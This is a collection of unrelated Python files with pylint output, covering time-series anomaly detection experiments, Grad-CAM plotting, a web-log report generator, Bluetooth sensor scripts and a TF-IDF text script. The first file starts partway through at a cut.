61 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=s)),
62 ('classifier', Alpaca())])
63 alpaca.fit(X_train, y_train, classifier__stacked=False, classifier__n_clusters=200)
64
65 # Prediction
66 y_pred_bin, y_pred = alpaca.predict(X_test, voting="veto")
67 y_test_bin = np.copy(y_test)
68 y_test_bin[y_test_bin > 0] = 1
69
70 # BINARY RESULTS (AD + ENSEMBLE)
71 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_bin).ravel()
72 # Append overall error
73 results.append([s, r, 'err_bin', (fp + fn) / (tn + fp + fn + tp)])
74 # Append false negative rate
75 results.append([s, r, 'fnr_bin', fn / (fn + tp)])
76 # Append false positive rate
77 results.append([s, r, 'fpr_bin', fp / (fp + tn)])
78
79 # CLASSIFIER RESULTS
80 y_pred_clf = np.copy(y_pred)
81 y_pred_clf[y_pred_clf != 0] = 1 # Also turn classifier predictions to binary for cfm
82 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_clf).ravel()
83 # Append overall error
84 results.append([s, r, 'err_ens', (fp + fn) / (tn + fp + fn + tp)])
85 # Append false negative rate
86 results.append([s, r, 'fnr_ens', fn / (fn + tp)])
87 # Append false positive rate
88 results.append([s, r, 'fpr_ens', fp / (fp + tn)])
89 """
90 # TIMING
91 sample = np.transpose(to_time_series_dataset(X_test[0]), (2, 0, 1))
92 start = time.time()
93 for i in range(100):
94 alpaca.predict(sample, voting='veto')
95 end = time.time()
96 timing.append([(end - start) * 10, s]) # in ms
97
98
99 # SAVE OUTLIERS (with y_pred,y_pred_bin, y_true)
100 idx = np.where(y_test_bin != y_pred_bin)
101 # Flattened curves
102 for i in idx[0]:
103 outliers.append([X_test[i],
104 y_pred[i],
105 y_test[i],
106 y_pred_bin[i],
107 y_test_bin[i]])
108 """
109 t_end = time.time()
110 print("Substest finished, duration ",(t_end-t_start))
111
112 # SAVE ALL RESULTS PER DATASET
113 df = pd.DataFrame(results, columns=['resampling', 'test', 'metric', 'value'])
114 df.to_csv("..\\results\\Test"+dataset+".csv")
115 #df = pd.DataFrame(timing, columns=['time', 'resampling'])
116 #df.to_csv("..\\results\\Timing"+dataset+".csv")
117 #df = pd.DataFrame(outliers, columns=['sample', 'y_pred', 'y_test', 'y_pred_bin', 'y_test_bin'])
118 #df.to_pickle("..\\results\\Outliers"+dataset+".pkl")
119
120
121 #plot_confusion_matrix(y_test_bin.astype(int), y_pred_bin.astype(int), np.array(["0", "1"]), cmap=plt.cm.Blues)
122 #plt.show()
123 #plot_confusion_matrix(y_test.astype(int), y_pred.astype(int), np.array(["0", "1", "2", "3", "?"]), cmap=plt.cm.Greens)
124 #plt.show()
125
126
127
| 51 - error: possibly-used-before-assignment
89 - warning: pointless-string-statement
2 - warning: unused-import
|
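
The err/fnr/fpr values appended to results above come straight from the binary confusion matrix. A worked example of the same three rates on a toy vector (using sklearn's confusion_matrix for the standalone sketch; the record imports its own from utils):

from sklearn.metrics import confusion_matrix

y_true = [0, 0, 0, 1, 1, 1, 1, 0]
y_pred = [0, 1, 0, 1, 0, 1, 1, 0]

tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
print((fp + fn) / (tn + fp + fn + tp))  # overall error: 2/8 = 0.25
print(fn / (fn + tp))                   # false negative rate: 1/4 = 0.25
print(fp / (fp + tn))                   # false positive rate: 1/4 = 0.25
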
1 from alpaca import Alpaca
2 from utils import to_time_series_dataset, to_dataset, split_df, TimeSeriesResampler
3 import time
4 import numpy as np
5 import pandas as pd
6 from sklearn.pipeline import Pipeline
7
8 max_sample = 20
9
10 for dataset in ['uc2']:
11 if dataset == 'uc1':
12 X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'),
13 index_column='run_id',
14 feature_columns=['fldPosition', 'fldCurrent'],
15 target_name='target')
16 y = np.array(y)
17 # Length of timeseries for resampler and cnn
18 sz = 38
19 # Number of channels for cnn
20 num_channels = len(X[0][0])
21 # Number of classes for cnn
22 num_classes = np.unique(y).shape[0]
23 if dataset == 'uc2':
24 X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'),
25 index_column='run_id',
26 feature_columns=['position', 'force'],
27 target_name='label')
28 y = np.array(y)
29 # Length of timeseries for resampler and cnn
30 sz = 200
31 # Number of channels for cnn
32 num_channels = len(X[0][0])
33 # Number of classes for cnn
34 num_classes = np.unique(y).shape[0]
35
36 resampler = TimeSeriesResampler(sz=sz)
37 alpaca = Pipeline([('resampler', resampler),
38 ('classifier', Alpaca())])
39 alpaca.fit(X, y, classifier__stacked=False, classifier__n_clusters=200)
40
41 # Measure time for single sample processing
42 t = []
43 for i in range(1, max_sample+1):
44 for j in range(10):
45 rand = np.random.randint(2000)
46 sample = np.transpose(to_time_series_dataset(X[rand]), (2, 0, 1))
47 start = time.process_time()
48 for k in range(100):
49 for l in range(i):
50 y_pred_bin, y_pred = alpaca.predict(sample, voting='veto')
51 end = time.process_time()
52 t.append([i, (end-start)/100, 'single'])
53
54 # Measure time for batch processing of multiple sample numbers
55 for i in range(1, max_sample+1):
56 for j in range(10):
57 rand = np.random.randint(2000)
58 if i == 1:
59 sample = np.transpose(to_time_series_dataset(X[rand]), (2, 0, 1))
60 else:
61 sample = to_dataset(X[rand:rand+i])
62
63 start = time.process_time()
64 for k in range(100):
65 y_pred_bin, y_pred = alpaca.predict(sample, voting='veto')
66 end = time.process_time()
67 t.append([i, (end-start)/100, 'batch'])
68
69 df = pd.DataFrame(t, columns=['Sample Number', 'Time', 'Type'])
70 df.to_csv("..\\results\\Time_"+dataset+".csv")
71
72
73
74
| 36 - error: possibly-used-before-assignment
|
1 import tensorflow.keras.backend as K
2 import tensorflow.keras
3 from tensorflow.keras.layers import Lambda
4 from tensorflow.keras.models import Model, load_model
5 tensorflow.compat.v1.disable_eager_execution()
6 import tensorflow as tf
7
8 import pandas as pd
9 import numpy as np
10 import matplotlib.pyplot as plt
11
12 from utils import to_time_series_dataset, split_df, load_test, TimeSeriesResampler, TimeSeriesScalerMeanVariance
13 from scipy.interpolate import interp1d
14
15 import seaborn as sns
16 sns.set(style='white',font='Palatino Linotype',font_scale=1,rc={'axes.grid' : False})
17
18
19 def get_model(id):
20 model = load_model('.\\models\\cam_cnn_'+id+'.h5')
21 return model
22
23
24 def target_category_loss(x, category_index, nb_classes):
25 return tf.multiply(x, K.one_hot([category_index], nb_classes))
26
27
28 def target_category_loss_output_shape(input_shape):
29 return input_shape
30
31
32 def normalize(x):
33 # utility function to normalize a tensor by its L2 norm
34 return x / (K.sqrt(K.mean(K.square(x))) + 1e-5)
35
36
37 def load_data(dataset):
38 if dataset == 'test':
39 X, y = load_test()
40 sz = 230
41 elif dataset == 'uc1':
42 X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'),
43 index_column='run_id',
44 feature_columns=['fldPosition', 'fldCurrent'],
45 target_name='target')
46 # Length of timeseries for resampler and cnn
47 sz = 38
48 elif dataset == 'uc2':
49 X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'),
50 index_column='run_id',
51 feature_columns=['position', 'force'],
52 target_name='label')
53 # Length of timeseries for resampler and cnn
54 sz = 200
55 resampler = TimeSeriesResampler(sz=sz)
56 X = resampler.fit_transform(X, y)
57 y = np.array(y)
58 return X, y
59
60
61 def get_sample(X, y, label, rs=100):
62 s = np.random.RandomState(rs)
63 s = s.choice(np.where(y == label)[0], 1)
64 x_raw = to_time_series_dataset(X[s, :, :])
65 scaler = TimeSeriesScalerMeanVariance(kind='constant')
66 X = scaler.fit_transform(X)
67 x_proc = to_time_series_dataset(X[s, :, :])
68 return x_proc, x_raw
69
70
71 def _compute_gradients(tensor, var_list):
72 grads = tf.gradients(tensor, var_list)
73 return [grad if grad is not None else tf.zeros_like(var) for var, grad in zip(var_list, grads)]
74
75
76 def grad_cam(input_model, data, category_index, nb_classes, layer_name):
77 # Lambda function for getting target category loss
78 target_layer = lambda x: target_category_loss(x, category_index, nb_classes)
79 # Lambda layer for function
80 x = Lambda(target_layer, output_shape = target_category_loss_output_shape)(input_model.output)
81 # Add Lambda layer as output to model
82 model = Model(inputs=input_model.input, outputs=x)
83 #model.summary()
84 # Function for getting target category loss y^c
85 loss = K.sum(model.output)
86 # Get the layer with "layer_name" as name
87 conv_output = [l for l in model.layers if l.name == layer_name][0].output
88 # Define function to calculate gradients
89 grads = normalize(_compute_gradients(loss, [conv_output])[0])
90 gradient_function = K.function([model.input], [conv_output, grads])
91
92 # Calculate convolution layer output and gradients for datasample
93 output, grads_val = gradient_function([data])
94 output, grads_val = output[0, :], grads_val[0, :, :]
95
96 # Calculate the neuron importance weights as mean of gradients
97 weights = np.mean(grads_val, axis = 0)
98 # Calculate CAM by multiplying weights with the respective output
99 cam = np.zeros(output.shape[0:1], dtype = np.float32)
100 for i, w in enumerate(weights):
101 cam += w * output[:, i]
102 # Interpolate CAM to get it back to the original data resolution
103 f = interp1d(np.linspace(0, 1, cam.shape[0]), cam, kind="slinear")
104 cam = f(np.linspace(0,1,data.shape[1]))
105 # Apply ReLU function to only get positive values
106 cam[cam < 0] = 0
107
108 return cam
109
110
111 def plot_grad_cam(cam, raw_input, cmap, alpha, language='eng'):
112 fig, ax = plt.subplots(raw_input.shape[-1], 1, figsize=(15, 9), sharex=True)
113 # fig.suptitle('Gradient Class Activation Map for sample of class %d' %predicted_class)
114 if language == 'eng':
115 ax_ylabel = [r"Position $\mathit{z}$ in mm", r"Velocity $\mathit{v}$ in m/s", r"Current $\mathit{I}$ in A"]
116 if language == 'ger':
117 ax_ylabel = [r"Position $\mathit{z}$ in mm", r"Geschwindigkeit $\mathit{v}$ in m/s", r"Stromstärke $\mathit{I}$ in A"]
118 for i, a in enumerate(ax):
119 left, right = (-1, raw_input.shape[1] + 1)
120 range_input = raw_input[:, :, i].max() - raw_input[:, :, i].min()
121 down, up = (raw_input[:, :, i].min() - 0.1 * range_input, raw_input[:, :, i].max() + 0.1 * range_input)
122 a.set_xlim(left, right)
123 a.set_ylim(down, up)
124 a.set_ylabel(ax_ylabel[i])
125 im = a.imshow(cam.reshape(1, -1), extent=[left, right, down, up], aspect='auto', alpha=alpha, cmap=cmap)
126 a.plot(raw_input[0, :, i], linewidth=2, color='k')
127 fig.subplots_adjust(right=0.8)
128 cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7])
129 cbar = fig.colorbar(im, cax=cbar_ax)
130 if language == 'eng':
131 cbar_ax.set_ylabel('Activation', rotation=90, labelpad=15)
132 if language == 'ger':
133 cbar_ax.set_ylabel('Aktivierung', rotation=90, labelpad=15)
134 return ax
135
136 if __name__ == "__main__":
137
138 X, y = load_data('test')
139 nb_classes = np.unique(y).shape[0]
140 # Load model and datasample
141 preprocessed_input, raw_input = get_sample(X, y, label=1)
142 model = get_model('test')
143
144 # Get prediction
145 predictions = model.predict(preprocessed_input)
146 predicted_class = np.argmax(predictions)
147 print('Predicted class: ', predicted_class)
148
149 # Calculate Class Activation Map
150 cam = grad_cam(model, preprocessed_input, predicted_class, nb_classes, 'block2_conv1')
151 ax = plot_grad_cam(cam, raw_input, 'jet', 1)
152 plt.show()
153
| 19 - warning: redefined-builtin
20 - warning: redefined-outer-name
24 - warning: redefined-outer-name
39 - warning: redefined-outer-name
39 - warning: redefined-outer-name
55 - error: possibly-used-before-assignment
56 - error: used-before-assignment
56 - error: used-before-assignment
61 - warning: redefined-outer-name
61 - warning: redefined-outer-name
62 - error: no-member
76 - refactor: too-many-locals
76 - warning: redefined-outer-name
82 - warning: redefined-outer-name
99 - warning: redefined-outer-name
111 - refactor: too-many-locals
111 - warning: redefined-outer-name
111 - warning: redefined-outer-name
112 - warning: redefined-outer-name
124 - error: possibly-used-before-assignment
129 - warning: unused-variable
|
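
The heart of grad_cam above is the weighting step: average the gradients over the time axis to get one importance weight per filter, take the weighted sum of the filter activations, and keep only the positive part. A NumPy sketch of just that step, with random arrays standing in for the real layer output and gradients (the interpolation back to input resolution is omitted):

import numpy as np

rng = np.random.default_rng(0)
output = rng.normal(size=(25, 64))    # conv activations for one sample: timesteps x filters
grads = rng.normal(size=(25, 64))     # d(class score) / d(activations), same shape

weights = grads.mean(axis=0)          # neuron importance: mean gradient per filter
cam = (output * weights).sum(axis=1)  # weighted sum of filter activations per timestep
cam[cam < 0] = 0                      # ReLU: keep only positive evidence
print(cam.shape)                      # (25,) one value per timestep
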
1 from alpaca import Alpaca
2 from utils import load_test, split_df, TimeSeriesResampler,confusion_matrix
3 import time
4 from sklearn.model_selection import train_test_split
5 from sklearn.utils import shuffle
6 from sklearn.pipeline import Pipeline
7 import numpy as np
8 import pandas as pd
9
10
11 if __name__ == '__main__':
12
13 X, y = load_test()
14 # Length of timeseries for resampler and cnn
15 sz = 230
16 # Number of channels for cnn
17 num_channels = X.shape[-1]
18 # Number of classes for cnn
19 num_classes = np.unique(y).shape[0]
20 classes = np.array(["0", "1", "2", "3", "4", "?"])
21
22 repetitions = 1
23
24 results = []
25 outliers = np.empty((0, 230*3+5))
26
27 for r in range(repetitions):
28 print("Repetition #",r)
29
30 X, y = shuffle(X, y, random_state=r)
31 # Turn y to numpy array
32 y = np.array(y)
33 # Split into train and test sets
34 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=r)
35
36 for votingstr in ["democratic", "veto", "stacked_svc", "stacked_dtc"]:
37
38 if votingstr == 'stacked_svc':
39 meta = 'svc'
40 elif votingstr == 'stacked_dtc':
41 meta = 'dtc'
42
43 if votingstr == 'stacked_svc' or votingstr == 'stacked_dtc':
44 voting = 'stacked'
45 stacked = True
46 else:
47 stacked = False
48 voting = votingstr
49 meta = None
50
51 # Build pipeline from resampler and estimator
52 resampler = TimeSeriesResampler(sz=sz)
53 alpaca = Pipeline([('resampler', resampler),
54 ('classifier', Alpaca())])
55 alpaca.fit(X_train, y_train, classifier__stacked=stacked, classifier__n_clusters=100)
56 y_pred_bin, y_pred = alpaca.predict(X_test, voting=voting)
57
58 # Plot confusion matrix (Binary)
59 y_test_bin = np.copy(y_test)
60 y_test_bin[y_test_bin > 0] = 1
61
62 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_bin).ravel()
63
64 # Append overall error
65 results.append([votingstr, r, 'err', (fp+fn)/(tn+fp+fn+tp)])
66
67 # Append false negative rate
68 results.append([votingstr, r, 'fnr', fn/(fn+tp)])
69
70 # Append false positive rate
71 results.append([votingstr, r, 'fpr', fp/(fp+tn)])
72
73 # Save misclassified samples (with y_pred,y_pred_bin, y_true, and voting scheme)
74 idx = np.where(y_test_bin != y_pred_bin)
75 # Flattened curves
76 curves = X_test[idx].transpose(0, 2, 1).reshape(X_test[idx].shape[0],-1)
77 vote_type = np.array([votingstr for i in range(idx[0].shape[0])]).reshape((-1,1))
78 wrong = np.hstack([curves, y_pred[idx].reshape((-1,1)),y_test[idx].reshape((-1,1)),
79 y_pred_bin[idx].reshape((-1,1)),y_test_bin[idx].reshape((-1,1)), vote_type])
80 outliers = np.vstack((outliers,wrong))
81
82
83 df = pd.DataFrame(outliers)
84 df.to_csv("..\\results\\OutliersVotingTest.csv")
85
86 df = pd.DataFrame(results, columns=['voting', 'test', 'metric', 'value'])
87 df.to_csv("..\\results\\VotingTest.csv")
88
89
| 43 - refactor: consider-using-in
2 - warning: unused-import
3 - warning: unused-import
|
1 import numpy as np
2 import pandas as pd
3 from utils import split_df, TimeSeriesResampler, plot_confusion_matrix, Differentiator
4 from alpaca import Alpaca
5 from sklearn.model_selection import train_test_split
6 from sklearn.pipeline import Pipeline
7 import matplotlib.pyplot as plt
8
9 if __name__ == "__main__":
10
11 """
12 IMPORT YOUR DATA HERE
13 X, y =
14 DEFINE RESAMPLING LENGTH IF NEEDED
15 sz =
16 """
17
18 # Turn y to numpy array
19 y = np.array(y)
20 # Split into train and test sets
21 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y, random_state=42)
22
23 # Pipeline example
24 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=sz)),('alpaca', Alpaca())])
25 alpaca.fit(X_train, y_train)
26
27 """
28 # Example with additional channel derived from channel 0
29 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=sz)),
30 ('differentiator',Differentiator(channel=0)),
31 ('alpaca', Alpaca())])
32 """
33
34 y_pred_bin_veto, y_pred_veto = alpaca.predict(X_test, voting="veto")
35 y_pred_bin_dem, y_pred_dem = alpaca.predict(X_test, voting="democratic")
36 y_pred_bin_meta_dtc, y_pred_meta_dtc = alpaca.predict(X_test, voting="meta_dtc")
37 y_pred_bin_meta_svc, y_pred_meta_svc = alpaca.predict(X_test, voting="meta_svc")
38
39 # Store all results in a dataframe
40 y_pred_indiv = np.column_stack((y_pred_bin_veto, y_pred_veto,y_pred_bin_dem, y_pred_dem, y_pred_bin_meta_dtc,
41 y_pred_meta_dtc, y_pred_bin_meta_svc, y_pred_meta_svc, y_test)).astype(int)
42 df_results = pd.DataFrame(y_pred_indiv, columns = ['y_pred_bin_veto', 'y_pred_veto','y_pred_bin_dem',
43 'y_pred_dem', 'y_pred_bin_meta_dtc','y_pred_meta_dtc',
44 'y_pred_bin_meta_svc', 'y_pred_meta_svc', 'y_true'])
45 df_results.to_csv("results\\y_pred_total.csv",index=False)
46 print("TEST FINISHED SUCCESSFULLY")
47
| 11 - warning: pointless-string-statement
19 - error: used-before-assignment
21 - error: undefined-variable
24 - error: undefined-variable
27 - warning: pointless-string-statement
3 - warning: unused-import
3 - warning: unused-import
3 - warning: unused-import
7 - warning: unused-import
|
1 # -*- coding:utf-8 -*-
2 import configparser
3
4
5 class Config:
6 """get config from the ini file"""
7
8 def __init__(self, config_file):
9 all_config = configparser.RawConfigParser()
10 with open(config_file, 'r',encoding="UTF-8") as cfg_file:
11 all_config.readfp(cfg_file)
12
13 self.log_format = all_config.get('format', 'log-format')
14 self.log_pattern = all_config.get('format', 'log-pattern')
15
16 self.support_method = all_config.get('filter', 'support_method').split(',')
17 self.is_with_parameters = int(all_config.get('filter', 'is_with_parameters'))
18 self.always_parameter_keys = all_config.get('filter', 'always_parameter_keys').split(',')
19 self.urls_most_number = int(all_config.get('filter', 'urls_most_number'))
20 self.urls_pv_threshold = int(all_config.get('filter', 'urls_pv_threshold'))
21 self.urls_pv_threshold_time = int(all_config.get('filter', 'urls_pv_threshold_time'))
22 self.urls_pv_threshold_min = int(all_config.get('filter', 'urls_pv_threshold_min'))
23
24 self.ignore_url_suffix = all_config.get('filter', 'ignore_url_suffix').split(',')
25
26 self.fixed_parameter_keys = all_config.get('filter', 'fixed_parameter_keys').split(',')
27 self.custom_parameters_list = all_config.get('filter', 'custom_parameters').split(',')
28 self.custom_keys = []
29 self.custom_parameters = {}
30 for item in self.custom_parameters_list:
31 key = item.split('=')[0]
32 if len(item.split('=')) == 2:
33 value = item.split('=')[1]
34 else:
35 value = ''
36 self.custom_parameters.setdefault(key, value)
37 self.custom_keys.append(key)
38 self.ignore_urls = all_config.get('filter', 'ignore_urls').split(',')
39 self.static_file = all_config.get('filter', 'static-file').split(',')
40
41 self.second_line_flag = int(all_config.get('report', 'second_line_flag'))
42 self.cost_time_flag = int(all_config.get('report', 'cost_time_flag'))
43 self.cost_time_percentile_flag = int(all_config.get('report', 'cost_time_percentile_flag'))
44 self.cost_time_threshold = all_config.get('report', 'cost_time_threshold')
45 self.upload_flag = int(all_config.get('report', 'upload_flag'))
46 self.upload_url = all_config.get('report', 'upload_url')
47
48 self.goaccess_flag = int(all_config.get('goaccess', 'goaccess_flag'))
49 self.time_format = all_config.get('goaccess', 'time-format')
50 self.date_format = all_config.get('goaccess', 'date-format')
51 self.goaccess_log_format = all_config.get('goaccess', 'goaccess-log-format')
52
53 config = Config('../conf/config.ini')
| 5 - refactor: too-many-instance-attributes
11 - warning: deprecated-method
5 - refactor: too-few-public-methods
|
1 # -*- coding:utf-8 -*-
2 import json
3 import requests
4
5 from util import get_dir_files
6 from config import config
7 from jinja2 import Environment, FileSystemLoader
8
9 env = Environment(loader=FileSystemLoader('./templates'))
10 report_template = env.get_template('report.html')
11 index_template = env.get_template('index.html')
12 url_template = env.get_template('url.html')
13
14
15 def upload_report(data, hours_times, minutes_times):
16 target_file = data['source_file']
17 pv = data['pv']
18 uv = data['uv']
19 get_count = data['method_counts']['get']
20 get_percent = data['method_counts']['get_percentile']
21 post_count = data['method_counts']['post']
22 post_percent = data['method_counts']['post_percentile']
23 response_peak = data['response_peak']
24 response_peak_time = data['response_peak_time']
25 response_avg = data['response_avg']
26 hours_times = hours_times
27 hours_pv = data['hours_hits']
28 hours_most_common = data['hours_hits'].most_common(1)[0]
29 hours_pv_peak = hours_most_common[1]
30 hours_pv_peak_time = hours_most_common[0]
31 minute_times = minutes_times
32 minute_pv = data['minutes_hits']
33 minute_most_common = data['minutes_hits'].most_common(1)[0]
34 minute_pv_peak = minute_most_common[1]
35 minute_pv_peak_time = minute_most_common[0]
36 cost_percent = data['cost_time_range_percentile']
37 cost_time_threshold = data['cost_time_threshold']
38 cost_range = data['cost_time_range']
39 url_data_list = []
40
41 for url_data in data['url_data_list']:
42 url_data_list.append(url_data.get_data())
43
44 data = {'target_file': target_file, 'pv': pv, 'uv': uv,
45 'get_count': get_count, 'get_percent': get_percent,
46 'post_count': post_count, 'post_percent': post_percent,
47 'response_peak': response_peak, 'response_peak_time': response_peak_time,
48 'response_avg': response_avg,
49 'hours_times': hours_times,
50 'hours_pv': hours_pv,
51 'hours_pv_peak': hours_pv_peak,
52 'hours_pv_peak_time': hours_pv_peak_time,
53 'minute_times': minute_times,
54 'minute_pv': minute_pv,
55 'minute_pv_peak': minute_pv_peak,
56 'minute_pv_peak_time': minute_pv_peak_time,
57 'cost_percent': cost_percent,
58 'cost_percent_range': ['<50ms', '50~100ms', '100~150ms', '150~200ms', '200~250ms', '250~300ms',
59 '300~350ms', '350~400ms', '400~450ms', '450~500ms', '>500ms'],
60 'cost_time_threshold': cost_time_threshold,
61 'url_data_list': url_data_list,
62 'cost_range': cost_range,
63 'status_codes': data['status_codes']}
64 headers = {'Content-Type': 'application/json'}
65 r = requests.post(config.upload_url, data=json.dumps(data), headers=headers)
66 print(r.text)
67
68
69 def generate_web_log_parser_report(data):
70 if config.goaccess_flag:
71 data.setdefault('goaccess_file', data.get('source_file') + '_GoAccess.html')
72         data.setdefault('goaccess_title', u'View the GoAccess-generated report')
73 else:
74 data.setdefault('goaccess_file', '#')
75         data.setdefault('goaccess_title', u'The GoAccess report is disabled and cannot be viewed')
76
77 hours_times = sorted(list(data.get('hours_hits')))
78 minutes_times = sorted(list(data.get('minutes_hits')))
79 seconds_times = sorted(list(data.get('second_hits')))
80
81 if config.upload_flag:
82 upload_report(data, hours_times, minutes_times)
83
84 html = report_template.render(data=data,
85 web_log_urls_file=data.get('source_file') + '_urls.html',
86 second_line_flag=config.second_line_flag,
87 hours_times=hours_times,
88 minutes_times=minutes_times,
89 seconds_times=seconds_times,
90 method_counts=data.get('method_counts'),
91 cost_time_range_percentile=data.get('cost_time_range_percentile'),
92 cost_time_list=data.get('cost_time_list'),
93 cost_time_flag=data.get('cost_time_flag'),
94 cost_time_percentile_flag=data.get('cost_time_percentile_flag'),
95 cost_time_threshold=data.get('cost_time_threshold'),
96 cost_time_range=data.get('cost_time_range'),
97 status_codes=data.get('status_codes'),
98 status_codes_keys=data.get('status_codes').keys())
99
100 html_file = '../result/report/' + data.get('source_file') + '.html'
101 with open(html_file, 'wb') as f:
102 f.write((html.encode('utf-8')))
103
104
105 def generate_web_log_parser_urls(data):
106 html = url_template.render(data=data,
107 url_datas=sorted(data.get('urls')))
108
109 html_file = '../result/urls/' + data.get('source_file') + '_urls.html'
110 with open(html_file, 'wb') as f:
111 f.write((html.encode('utf-8')))
112
113
114 def update_index_html():
115 html = index_template.render(files=sorted(get_dir_files('../result/report/')))
116
117 with open('../result/index.html', 'wb') as f:
118 f.write((html.encode('utf-8')))
| 15 - refactor: too-many-locals
26 - warning: self-assigning-variable
65 - warning: missing-timeout
72 - warning: redundant-u-string-prefix
75 - warning: redundant-u-string-prefix
|
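
All three generate_* functions above follow the same render-then-write pattern. A minimal sketch of that pattern with an inline jinja2 Template instead of the repo's templates/report.html (the field names here are just examples):

from jinja2 import Template

template = Template("<h1>{{ data['source_file'] }}</h1><p>PV: {{ data['pv'] }}</p>")
html = template.render(data={"source_file": "access.log", "pv": 12345})

with open("report_example.html", "wb") as f:
    f.write(html.encode("utf-8"))
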
1 ##Main
2
3 from bluepy import btle
4 from bluepy.btle import Peripheral, DefaultDelegate
5 import os.path
6 import struct
7 import binascii
8 import sys
9 import datetime
10 import time
11 from time import time,sleep
12 import Services
13 from Services import EnvironmentService, BatterySensor, UserInterfaceService, MotionService, DeviceDelegate
14 import Device
15 from Device import Device
16 from urllib.request import urlopen
17
18
19 ##Mac 1: FD:88:50:58:E7:45
20 ##Mac 2: E4:F6:C5:F7:03:39
21
22 ## MAC address Device device
23 global MAC
24
25
26 if __name__ == "__main__":
27 MAC = str(sys.argv[1])
28
29
30
31 print("Connecting to " + MAC)
32 Device1 = Device(MAC)
33 print("Connected...")
34 print("Bonding...")
35 Device1.setSecurityLevel("medium")
36 print("Bonded...")
37
38
39 print("Enabling Services...")
40 Device1.battery.enable()
41 #~ Device1.ui.enable()
42 Device1.motion.enable()
43
44
45
46 Device1.setDelegate(DeviceDelegate())
47
48 print('Services Enabled...')
49
50 print('Battery Level(1): ', Device1.battery.b_read(), '%')
51
52
53
54
55 #~ Device1.ui.set_led_mode_breathe(0x02, 50, 1000)
56 ##Battery sensor
57 #~ Device1.battery.set_battery_notification(True)
58
59 ##UI service
60 #~ Device1.ui.set_button_notification(True)
61
62 ##Motion Services
63 Device1.motion.configure(motion_freq=5)
64 #~ Device1.motion.set_tap_notification(True)
65 #~ Device1.motion.set_orient_notification(True)
66 #~ Device1.motion.set_quaternion_notification(True)
67 #~ Device1.motion.set_stepcount_notification(True)
68 #~ Device1.motion.set_rawdata_notification(True)
69 Device1.motion.set_euler_notification(True)
70 #~ Device1.motion.set_rotation_notification(True)
71 #~ Device1.motion.set_heading_notification(True)
72 #~ Device1.motion.set_gravity_notification(True)
73
74
75
76
77
78
79 try:
80 while True:
81 if Device1.waitForNotifications(180.0) :
82 # handleNotification() was called
83 continue
84 print("Waiting...")
85
86
87
88 except KeyboardInterrupt:
89 print("Disabling Notifications and Indications...")
90 Device1.battery.disable()
91 Device1.ui.disable()
92 Device1.motion.disable()
93 print("Notifications and Indications Disabled...")
94 print("Device Session Finished...")
| 23 - warning: global-at-module-level
3 - warning: unused-import
4 - warning: unused-import
4 - warning: unused-import
5 - warning: unused-import
6 - warning: unused-import
7 - warning: unused-import
9 - warning: unused-import
10 - warning: unused-import
11 - warning: unused-import
12 - warning: unused-import
13 - warning: unused-import
13 - warning: unused-import
13 - warning: unused-import
13 - warning: unused-import
16 - warning: unused-import
|
1 #####################################################################
2 # BLE devices handler #
3 # A new subprocess is created for each preregistered device in: #
4 # ./devices.mac #
5 #####################################################################
6
7 import subprocess
8 import time
9
10 #~ mac_file = open('devices.mac', 'r')
11
12 #~ for mac_address in mac_file:
13 #~ subprocess.call(['gnome-terminal', '-e', 'python3 main.py ' + mac_address])
14 #~ time.sleep(10)
15
16 subprocess.call(['gnome-terminal', '-e', 'python3 main.py FD:88:50:58:E7:45' ])
17 time.sleep(20)
18 subprocess.call(['gnome-terminal', '-e', 'python3 mainMotion.py E4:F6:C5:F7:03:39' ])
| Clean Code: No Issues Detected
|
1
2
3 from bluepy import btle
4 from bluepy.btle import Peripheral, DefaultDelegate
5 import Services
6 from Services import EnvironmentService, BatterySensor, UserInterfaceService, MotionService, DeviceDelegate
7
8
9 ## Thingy52 Definition
10
11 class Device(Peripheral):
12     ##Thingy:52 module. Instantiate the class to get access to the Thingy:52 sensors.
13     #The addr of your device has to be known; it can be found by using the hcitool command line
14 #tool, for example. Call "> sudo hcitool lescan" and your Thingy's address should show up.
15
16 def __init__(self, addr):
17 Peripheral.__init__(self, addr, addrType="random")
18
19 #Thingy configuration service not implemented
20 self.battery = BatterySensor(self)
21 self.environment = EnvironmentService(self)
22 self.ui = UserInterfaceService(self)
23 self.motion = MotionService(self)
24 #self.sound = SoundService(self)
25
26
27
28
29
30
| 11 - refactor: too-few-public-methods
3 - warning: unused-import
4 - warning: unused-import
5 - warning: unused-import
6 - warning: unused-import
|
1 # coding=utf-8
2 import codecs
3 import re
4 from abstract import Abstract
5
6 __author__ = 'rcastro'
7
8 from gensim.models import Word2Vec
9 from codecs import open
10 import nltk
11 #nltk.download() # Download text data sets, including stop words
12 from nltk.corpus import stopwords # Import the stop word list
13 import numpy as np
14
15 #model = Word2Vec.load_word2vec_format("/Users/rcastro/nltk_data/word2vec_models/GoogleNews-vectors-negative300.bin", binary=True)
16 #print(model.most_similar('Crayfish', topn=5))
17
18 print ("get the abstracts")
19 text = ''
20 try:
21 with codecs.open('/Users/rcastro/dev/abstracts.txt', 'r', encoding='utf8') as abstracts_file:
22 text = abstracts_file.read().strip()
23 except IOError as e:
24 print ('Operation failed: %s' % e.strerror)
25
26 abstracts = [Abstract(x) for x in text.split("\r\n\r\n")]
27 num_reviews = len(abstracts)
28 clean_train_reviews = [x.text for x in abstracts]
29
30 def remove_numeric_tokens(string):
31 return re.sub(r'\d+[^\w|-]+', ' ', string)
32
33 vectorizer = TfidfVectorizer(analyzer="word",
34 tokenizer=None,
35 preprocessor=remove_numeric_tokens,
36 stop_words='english',
37 lowercase=True,
38 ngram_range=(1, 2),
39 min_df=1,
40                              max_df=1, # maybe try around 0.8 here
41 token_pattern=r"(?u)\b[\w][\w|-]+\b",
42 max_features=155000)
43 analyzer = vectorizer.build_analyzer()
44
45 review_lists = [analyzer(w) for w in clean_train_reviews]
46
47
48
